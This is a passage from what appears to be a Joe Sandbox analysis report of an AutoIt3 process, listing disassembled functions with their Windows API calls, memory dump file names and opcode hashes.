                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 008863F3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      • Opcode ID: d238aac1a230526cb9bb11665353a9f3996d2800ad14058b9d249cdff6471e44
                                      • Instruction ID: e6519d7467d30e3dc23b9f5a61eb206bd87b9a0ff7d5c4af865ad0766cd2eabe
                                      • Opcode Fuzzy Hash: d238aac1a230526cb9bb11665353a9f3996d2800ad14058b9d249cdff6471e44
                                      • Instruction Fuzzy Hash: 0E11EE31304914AFD700BB28CC45FBA77A8FF86320F184119F916DB2D2DBA1AC10CB91
                                      Function 0085E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0085F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0085E46F,?,?,?,0085F262,00000000,000000EF,00000119,?,?), ref: 0085F867
                                        • Part of subcall function 0085F858: lstrcpyW.KERNEL32(00000000,?), ref: 0085F88D
                                        • Part of subcall function 0085F858: lstrcmpiW.KERNEL32(00000000,?,0085E46F,?,?,?,0085F262,00000000,000000EF,00000119,?,?), ref: 0085F8BE
                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0085F262,00000000,000000EF,00000119,?,?,00000000), ref: 0085E488
                                      • lstrcpyW.KERNEL32(00000000,?), ref: 0085E4AE
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0085F262,00000000,000000EF,00000119,?,?,00000000), ref: 0085E4E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
                                      • Opcode ID: 4135f92ad85322af805d4a12840f074b26e113b9e5268cb2fd38612411cadc6d
                                      • Instruction ID: 556d2a39c65575e7041099ed72b6990a627a952125b63a5da1fac590f9175f05
                                      • Opcode Fuzzy Hash: 4135f92ad85322af805d4a12840f074b26e113b9e5268cb2fd38612411cadc6d
                                      • Instruction Fuzzy Hash: 7511933A100345EFDB29AF28DC45D7A77A9FF45351B40402AFD06CB2A0FB719954CB95
                                      Function 00835312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00835331
                                        • Part of subcall function 0082593C: __FF_MSGBANNER.LIBCMT ref: 00825953
                                        • Part of subcall function 0082593C: __NMSG_WRITE.LIBCMT ref: 0082595A
                                        • Part of subcall function 0082593C: RtlAllocateHeap.NTDLL(00E90000,00000000,00000001,?,00000004,?,?,00821003,?), ref: 0082597F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: d1c8bf2699fb67a97cd57ca0a869ffc1e12fca7fe520fe39d297fc2ff60d2e9b
                                      • Instruction ID: 74045b01e6cde9d9f5fd76bbfde52e16d4fef76031859523c00f912fa9fa1cfb
                                      • Opcode Fuzzy Hash: d1c8bf2699fb67a97cd57ca0a869ffc1e12fca7fe520fe39d297fc2ff60d2e9b
                                      • Instruction Fuzzy Hash: F6119432506A29EFCF203B78FC4565A3A94FF963A0F10452AF858DA291DE74898497D1
                                      Function 00815B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00815B58
                                        • Part of subcall function 008156F8: _memset.LIBCMT ref: 00815787
                                        • Part of subcall function 008156F8: _wcscpy.LIBCMT ref: 008157DB
                                        • Part of subcall function 008156F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008157EB
                                      • KillTimer.USER32(?,00000001,?,?), ref: 00815BAD
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00815BBC
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00850D7C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                      • String ID:
                                      • API String ID: 1378193009-0
                                      • Opcode ID: 46e4cfc77dba6e429b58d00f400a1d308cccb0bb6d356158193d5fd26233d592
                                      • Instruction ID: 8000ef97d1b4da48c4eaaa8b1672e09f1408abceb9766f140bd2b99d6a1ad91e
                                      • Opcode Fuzzy Hash: 46e4cfc77dba6e429b58d00f400a1d308cccb0bb6d356158193d5fd26233d592
                                      • Instruction Fuzzy Hash: 8B21DA70908784AFE7728B648895FEABBFCFF41319F04058DE69A96141C37429C8DF51
                                      Function 00864365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00864385
                                      • _memset.LIBCMT ref: 008643A6
                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 008643F8
                                      • CloseHandle.KERNEL32(00000000), ref: 00864401
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                      • String ID:
                                      • API String ID: 1157408455-0
                                      • Opcode ID: 8796994b8385218d5ea793de64a32e8cc4967903a39aba17a51c6fbcbde9f809
                                      • Instruction ID: 2ace13e8cdd465863966b3b0b3d53a30c76842ee855682e60d7328041f2a7857
                                      • Opcode Fuzzy Hash: 8796994b8385218d5ea793de64a32e8cc4967903a39aba17a51c6fbcbde9f809
                                      • Instruction Fuzzy Hash: 5911EB71901228BAD7309BA5AC4DFEFBB7CFF45720F04459AF908E7280D6744E808BA4
                                      Function 00876A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0081402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867E51,?,?,00000000), ref: 00814041
                                        • Part of subcall function 0081402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867E51,?,?,00000000,?,?), ref: 00814065
                                      • gethostbyname.WSOCK32(?,?,?), ref: 00876A84
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00876A8F
                                      • _memmove.LIBCMT ref: 00876ABC
                                      • inet_ntoa.WSOCK32(?), ref: 00876AC7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                      • String ID:
                                      • API String ID: 1504782959-0
                                      • Opcode ID: 5fa2055da3ce2f0dd4542b3f2627d1dda68c02ecbeb95a6be2df5235f809b7f6
                                      • Instruction ID: 26df48af44d0247f11449e8104d885f117970d873d25c6ce186211b3f4163273
                                      • Opcode Fuzzy Hash: 5fa2055da3ce2f0dd4542b3f2627d1dda68c02ecbeb95a6be2df5235f809b7f6
                                      • Instruction Fuzzy Hash: CA114F72A40109AFCB40FBA8CD46CEEB7B8FF18311B148065F506E72A1DF309E549B92
                                      Function 008596F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00859719
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0085972B
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00859741
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0085975C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: c2138b66ae9223c131a416952f864ef50d9bc0e0bc78e3c6bf6dc1e54ad72293
                                      • Instruction ID: da3fe343871cce9ddf82b20fc808a041186fa1c1e7c671b8c8d597a305f91f79
                                      • Opcode Fuzzy Hash: c2138b66ae9223c131a416952f864ef50d9bc0e0bc78e3c6bf6dc1e54ad72293
                                      • Instruction Fuzzy Hash: DE115A3A901218FFEB11DF95CD84E9DBBB8FB48710F204092E904B7290D6716E14DB90
                                      Function 0080166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • DefDlgProcW.USER32(?,00000020,?), ref: 008016B4
                                      • GetClientRect.USER32(?,?), ref: 0083B93C
                                      • GetCursorPos.USER32(?), ref: 0083B946
                                      • ScreenToClient.USER32(?,?), ref: 0083B951
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Client$CursorLongProcRectScreenWindow
                                      • String ID:
                                      • API String ID: 4127811313-0
                                      • Opcode ID: 2378f6967fcebc8cb091238cd890ebec0a8e3fb9bd19da8c9a753500531369a0
                                      • Instruction ID: 16c08a6d9e43dfc4db646c6befc159a46b24470024cb026c2e6f86addfd6dda4
                                      • Opcode Fuzzy Hash: 2378f6967fcebc8cb091238cd890ebec0a8e3fb9bd19da8c9a753500531369a0
                                      • Instruction Fuzzy Hash: 98114375A01119AFCF40EFA8CC89DBE77B8FB14310F040456EA21E7180C331AA51CFA6
                                      Function 00802111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0080214F
                                      • GetStockObject.GDI32(00000011), ref: 00802163
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0080216D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CreateMessageObjectSendStockWindow
                                      • String ID:
                                      • API String ID: 3970641297-0
                                      • Opcode ID: bd32d16145b945f4ff5e0ea79ce355a5a16f743b942b0fbf63a649ffaebf231a
                                      • Instruction ID: 97bafeaceb7ffd6c8b57657790b7429dc2942c3e268889368839ed3620a7161b
                                      • Opcode Fuzzy Hash: bd32d16145b945f4ff5e0ea79ce355a5a16f743b942b0fbf63a649ffaebf231a
                                      • Instruction Fuzzy Hash: E5118B72201209BFDB425F949C88EEABB69FF58364F040112FB1492090D771AC61AFA0
                                      Function 00861941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008604EC,?,0086153F,?,00008000), ref: 0086195E
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,008604EC,?,0086153F,?,00008000), ref: 00861983
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008604EC,?,0086153F,?,00008000), ref: 0086198D
                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,008604EC,?,0086153F,?,00008000), ref: 008619C0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: fa744c5d0d3bbd0e662290866883722822a0f2952094515547fcffa97751d345
                                      • Instruction ID: 7c31077b72ce5e2611e1bc4c312ab8574cf5b0695413a68011028bd60d169593
                                      • Opcode Fuzzy Hash: fa744c5d0d3bbd0e662290866883722822a0f2952094515547fcffa97751d345
                                      • Instruction Fuzzy Hash: 61114831D0052DDBCF00AFA4D958BEEBF78FF08701F4A4146E980F2242CB3096908B95
                                      Function 0088E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0088E1EA
                                      • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0088E201
                                      • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0088E216
                                      • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0088E234
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Type$Register$FileLoadModuleNameUser
                                      • String ID:
                                      • API String ID: 1352324309-0
                                      • Opcode ID: 826d05b9b07daf1960701d59c768e2d86fd3482103cbc5bcc6fbe344f1c8b777
                                      • Instruction ID: 23bfbc35cc84557c9aadc970eedf6bb6384bb6e927c3f78f57ae06cc456ac70e
                                      • Opcode Fuzzy Hash: 826d05b9b07daf1960701d59c768e2d86fd3482103cbc5bcc6fbe344f1c8b777
                                      • Instruction Fuzzy Hash: 0D115EB52053099BE330AF51DD08F93BBBCFF01B18F10855AB656D6450D7B0F5049BA1
                                      Function 008371E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction ID: dd3fe2cb4b21c3e44824553f3af6782d665a3bb02fbf7f92cfdcb3406181bb85
                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction Fuzzy Hash: C2014BB204814EBBCF225E88CC418EE3F62FB99355F588515FE1998131D236C9B1ABD1
                                      Function 0088B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 0088B956
                                      • ScreenToClient.USER32(?,?), ref: 0088B96E
                                      • ScreenToClient.USER32(?,?), ref: 0088B992
                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0088B9AD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClientRectScreen$InvalidateWindow
                                      • String ID:
                                      • API String ID: 357397906-0
                                      • Opcode ID: 560c5f9a57e2eaade81789f2ee855cea508130a448ec9acefbdd09443035c8b1
                                      • Instruction ID: 3fca412b4bc8f74a5c3787f0ab5e3696cf036c1025ebf8640715496b4c7e08c7
                                      • Opcode Fuzzy Hash: 560c5f9a57e2eaade81789f2ee855cea508130a448ec9acefbdd09443035c8b1
                                      • Instruction Fuzzy Hash: DD1143B9D00209EFDB41DF98C984AEEBBF9FF58310F104156E914E3610D735AA658F50
                                      Function 0088BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0088BCB6
                                      • _memset.LIBCMT ref: 0088BCC5
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,008C8F20,008C8F64), ref: 0088BCF4
                                      • CloseHandle.KERNEL32 ref: 0088BD06
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memset$CloseCreateHandleProcess
                                      • String ID:
                                      • API String ID: 3277943733-0
                                      • Opcode ID: 34f8c95e8de1fe7242996f7d5251b6cd7daed02bdb7627e5fab7b20e4da8b731
                                      • Instruction ID: 8bc57549035042269ff9a724e3c008ea8d471750d5c38713a438ea334c780c6a
                                      • Opcode Fuzzy Hash: 34f8c95e8de1fe7242996f7d5251b6cd7daed02bdb7627e5fab7b20e4da8b731
                                      • Instruction Fuzzy Hash: BAF05EB2690314FFE2503765AC05FBB3A6DFB08751F040429BA48E51A2DF75881097B9
                                      Function 00867195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 008671A1
                                        • Part of subcall function 00867C7F: _memset.LIBCMT ref: 00867CB4
                                      • _memmove.LIBCMT ref: 008671C4
                                      • _memset.LIBCMT ref: 008671D1
                                      • LeaveCriticalSection.KERNEL32(?), ref: 008671E1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                      • String ID:
                                      • API String ID: 48991266-0
                                      • Opcode ID: 9a9ab180ad474fcd870ef84adddd11bf718d895e79cb24d0952d78329db6ca26
                                      • Instruction ID: ae90e3408c1f1403e52484e4ca69d5c48cccea3874a08485c26fc98e7085b6ea
                                      • Opcode Fuzzy Hash: 9a9ab180ad474fcd870ef84adddd11bf718d895e79cb24d0952d78329db6ca26
                                      • Instruction Fuzzy Hash: 4EF05436100110AFCF416F59EC85E4ABB29FF45320F08C051FE089E21ACB31A951DFB5
                                      Function 0088C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008016CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00801729
                                        • Part of subcall function 008016CF: SelectObject.GDI32(?,00000000), ref: 00801738
                                        • Part of subcall function 008016CF: BeginPath.GDI32(?), ref: 0080174F
                                        • Part of subcall function 008016CF: SelectObject.GDI32(?,00000000), ref: 00801778
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0088C3E8
                                      • LineTo.GDI32(00000000,?,?), ref: 0088C3F5
                                      • EndPath.GDI32(00000000), ref: 0088C405
                                      • StrokePath.GDI32(00000000), ref: 0088C413
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      • Opcode ID: e694136569ff394c7df59cfd63d5c316da5ae2c8fbda07bf6bcdff3b5df3371c
